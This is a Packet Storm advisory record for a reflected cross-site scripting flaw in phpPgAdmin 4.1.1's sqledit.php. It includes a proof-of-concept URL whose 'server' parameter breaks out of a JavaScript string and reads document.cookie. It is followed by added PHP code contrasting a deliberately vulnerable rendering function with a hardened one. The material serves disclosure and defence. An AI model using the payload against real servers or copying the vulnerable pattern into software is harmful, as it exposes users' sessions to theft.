phpPgAdmin-xss.txt

2007-05-23T00:00:00
ID PACKETSTORM:56920
Type packetstorm
Reporter Michal Majchrowicz
Modified 2007-05-23T00:00:00

Description

                                        
                                            `There is a JavaScript code Injection in phpPgAdmin which fails to correctly  
sanitize user supplied data. As a result very simple XSS is possible. This  
was tested on phpPgAdmin 4.1.1 as not logged user.  
PoC:  
https://test.com/phpPgAdmin/sqledit.php?server=%3A5432%3Aallow');alert(document.cookie);alert('phpPgAdmin%204.1.1%20XSS%20Vulnerability');//  
Regards Michal Majchrowicz.  
Hack.pl  
`
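
The ') sequence in the PoC suggests the "server" value is written into a single-quoted JavaScript string literal. The following is an added example, not phpPgAdmin's source and not part of the original advisory, contrasting that pattern with a hardened form; setServer(), the function names and the host:port:sslmode allow-list are assumptions made for illustration.

```php
<?php
// Added example: hypothetical code, not phpPgAdmin's actual source.
// Constructed input: the URL-decoded "server" value from the PoC above.
$server = ":5432:allow');alert(document.cookie);"
        . "alert('phpPgAdmin 4.1.1 XSS Vulnerability');//";

// Vulnerable pattern: request data concatenated into a single-quoted
// JavaScript string. The quote and parenthesis in the input close the
// literal and the call, so the remainder is parsed as script.
function render_vulnerable(string $server): string
{
    return "<script>setServer('" . $server . "');</script>";
}

// Encode a PHP string as a JavaScript string literal that is safe inside
// an inline <script> block: quotes, <, > and & become \uXXXX escapes.
function js_string(string $value): string
{
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP
        | JSON_THROW_ON_ERROR   // fail closed on invalid UTF-8 (PHP 7.3+)
    );
}

// Hardened pattern: allow-list the expected shape first, then encode for
// the JavaScript context. The host:port:sslmode shape is an assumption
// inferred from the ":5432:allow" prefix of the PoC value.
function render_hardened(string $server): string
{
    if (!preg_match('/\A[A-Za-z0-9.\-]*:\d{1,5}:[a-z]+\z/', $server)) {
        $server = '';   // reject anything that is not a plain server id
    }
    return "<script>setServer(" . js_string($server) . ");</script>";
}

echo "vulnerable:    ", render_vulnerable($server), PHP_EOL;
echo "encoding only: ", js_string($server), PHP_EOL;
echo "hardened:      ", render_hardened($server), PHP_EOL;
echo "legit value:   ", render_hardened("db.example:5432:allow"), PHP_EOL;
```

Encoding for the output context is the control that closes the hole; the allow-list is defence in depth and keeps malformed identifiers out of later code paths.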